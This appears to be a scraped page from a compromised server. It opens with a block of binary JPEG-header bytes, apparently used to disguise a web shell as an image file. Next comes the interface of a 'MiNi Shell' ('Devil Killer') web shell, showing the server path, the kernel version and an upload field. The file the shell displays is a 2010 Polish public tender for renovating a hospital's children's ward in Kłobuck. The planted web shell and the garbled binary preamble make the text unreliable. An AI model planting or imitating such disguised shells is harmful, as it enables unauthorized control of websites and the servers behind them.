JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/3944-N-2010.html

<p class="kh_header"><b>Kłobuck: Remont pomieszczeń oddziału dziecięcego, wewnętrznego Szpitala Rejonowego w Kłobucku</b><br>
<b>Numer ogłoszenia: 3944 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. 11 Listopada 5C, 42-100 Kłobuck, woj. śląskie, tel. 034 3172206 w. 41, 3172207, faks 034 3172301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozklobuck.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń oddziału dziecięcego, wewnętrznego Szpitala Rejonowego w Kłobucku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: 
      Prace budowlane wykończeniowe
- prace wyburzeniowe
- prace przygotowawcze,
- prace polegające na ułożeniu wykładziny podłogowej,
- prace polegające na gipsowaniu powierzchni ścian,
- prace malarskie, 
- montaż wewnętrznej stolarki drzwiowej.
Prace sanitarne i c.o.
- montaż i demontaż podejść dopływowych,
- montaż i demontaż części rurociągów kanalizacyjnych,
- montaż i demontaż części rurociągów instalacji wodnych,
- montaż i demontaż przyborów sanitarnych.
Prace elektryczne
- montaż i demontaż części instalacji elektrycznej,
- montaż i demontaż opraw oświetleniowych , gniazd wtyczkowych i wyłączników.

Szczegółowy opis zamierzenia podany jest w przedmiarze robót oraz specyfikacji technicznej. 
Zamawiający informuje, że ilekroć przedmiot zamówienia opisany jest przez wskazanie znaku towarowego, patentu lub pochodzenia, dopuszcza się rozwiązania równoważne z zastrzeżeniem, iż proponowane rozwiązania (materiały, urządzenia) będą posiadały parametry techniczne nie gorsze niż wymagane przez zamawiającego . Wykazanie równoważności zaoferowanego przedmiotu spoczywa na Wykonawcy, który jest obowiązany wykazać, że oferowane przez niego roboty budowlane (w tym m.in. proponowane materiały, urządzenia) spełniają wymagania określone przez zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10 000 zł, słownie: 
    dziesięć tysięcy złotych.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
    B.O.Ś. OO Kłobuck 83 1540 1014 2006 7302 9524 0001 z adnotacją wadium - Remont 
    pomieszczeń oddziału dziecięcego, wewnętrznego Szpitala Rejonowego w Kłobucku
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
     kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 
    dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 
    2007 r. Nr 42, poz. 275) 
w terminie 2010-01-26, sposób przekazania: Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy podany wyżej<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy 
    prawa nakładają obowiązek ich posiadania,
2) posiadania wiedzy i doświadczenia,
- wykonali z należytą starannością w okresie ostatnich pięciu lat poprzedzających datę     
  złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co    
  najmniej 1 robotę porównywalną z przedmiotem zamówienia wykonaną w czynnym budynku    
  użyteczności publicznej na kwotę nie mniejszą niż  600 000 zł,
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania 
    zamówienia,
  - dysponują kierownikiem budowy posiadającym uprawnienia budowlane do kierowania 
    robotami budowlanym lub odpowiadające im ważne uprawnienia budowlane, które zostały 
    wydane na podstawie wcześniej obowiązujących przepisów, posiadającym co najmniej 5 lat 
    doświadczenia zawodowego w tym: minimum 2 lata na stanowisku kierownika budowy lub 
    robót
4) sytuacji ekonomicznej i finansowej,

2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

3. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

4. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
5. Zamawiający odrzuca ofertę, jeżeli:
1)	jest niezgodną z ustawą.
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.
5)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
6)	zawiera błędy w obliczeniu ceny.
7)	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych
8)	jest nieważna na podstawie odrębnych przepisów,

6. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia - niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik 1
A.2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa 
        zamówień publicznych - załącznik 6
A.3) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z 
       art. 24 ust. 1 Prawa zamówień publicznych - załącznik nr 5
A.4) Wzór umowy - załącznik 4
B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z 
      art. 24 ust 1 Prawa zamówień publicznych wykonawca składa następujące dokumenty:
B.1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, 
       w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2
       ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
       a przypadku osób fizycznych oświadczenie wymienione w niniejszej specyfikacji.
B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, 
       o ile nie wynika to z przedstawionych dokumentów rejestrowych.
B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że 
       wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane 
        prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
        w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 
        miesiące przed upływem terminu składania ofert.
B.4) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 
        Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z 
        opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że 
        uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
        płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego 
        nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
B.5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
        pkt 4-8 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu 
        składania ofert.

C. W celu wykazania spełnienia przez wykonawcę warunków o których mowa w art. 22 ust. 1 pkt. 1) do 3) ustawy Pzp, należy złożyć następujące dokumenty:
 
C.1) Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku 
        wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat licząc od dnia złożenia 
        oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich 
        rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu 
        potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i 
        prawidłowo ukończone - co najmniej 1 robotę porównywalną z przedmiotem zamówienia 
        wykonaną w czynnym budynku użyteczności publicznej na kwotę nie mniejszą niż     
        600 000 zł,
C.2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od tego, 
        czy są one zatrudnione bezpośrednio przez wykonawcę, w szczególności 
        odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami 
        budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i 
        wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych 
        przez nie czynności.
        Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca, które będą 
        uczestniczyć w wykonywaniu zamówienia wraz z dokumentami potwierdzającymi, że 
        wymienione osoby posiadają wymagane uprawnienia wraz z aktualnymi dokumentami 
        stwierdzającymi przynależność tych osób do Okręgowej Izby Inżynierów i Techników 
        Budowlanych lub Okręgowej Izby Architektów  
C.3) Szczegółowy kosztorys ofertowy sporządzony w oparciu o przedmiar robót oraz 
       specyfikację techniczną

D. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

D.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.2), B.3), B.4), B.5) składa dokument 
        lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
        potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 
    miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
     albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
     zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - 
     wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej 
     niż 6 miesięcy przed upływem terminu składania ofert.
D.2) Zamiast dokumentu, o którym mowa w pkt. B.6) składa zaświadczenie właściwego organu 
        sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której 
        dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo 
        zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu 
        składania ofert.
D.3) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub 
         miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D
         zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, 
         właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego 
         lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym 
         wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w 
         terminach określonych w niniejszym pkt. D.

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 

E.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla 
      ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do 
      reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia 
      umowy.
E.2) Oferta winna zawierać: oświadczenia i dokumenty opisane powyżej dla każdego partnera 
       z osobna, pozostałe dokumenty składane są wspólnie.


F. Postanowienia dotyczące składanych dokumentów

F.1) Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C  polega na 
        zasobach innych podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów 
        brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie 
        razem z ofertą dokumentów wymienionych w pkt. od B.1) do B.5) dotyczących każdego z 
        tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia
F.2) Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii 
        poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę osoby uprawnione 
        do podpisania oferty z dopiskiem za zgodność z oryginałem.
F.3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w 
        przypadku podmiotów, o których mowa w pkt. F.1), kopie dokumentów dotyczących 
        każdego z tych podmiotów winny być poświadczane za zgodność z oryginałem przez te 
        podmioty
F.4) Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego 
        przedstawiciela wykonawcy wymagają załączenia właściwego pełnomocnictwa lub 
         umocowania prawnego.
F.5) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język 
       polski, poświadczonym przez wykonawcę.
F.6) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii 
       dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest 
       nieczytelna lub budzi wątpliwości, co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozklobuck.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej w  Kłobucku
ul. 11 Listopada 5c, 42 - 100 Kłobuck - pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 09:30, miejsce: Zespół Opieki Zdrowotnej w  Kłobucku
ul. 11 Listopada 5c, 42 - 100 Kłobuck - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com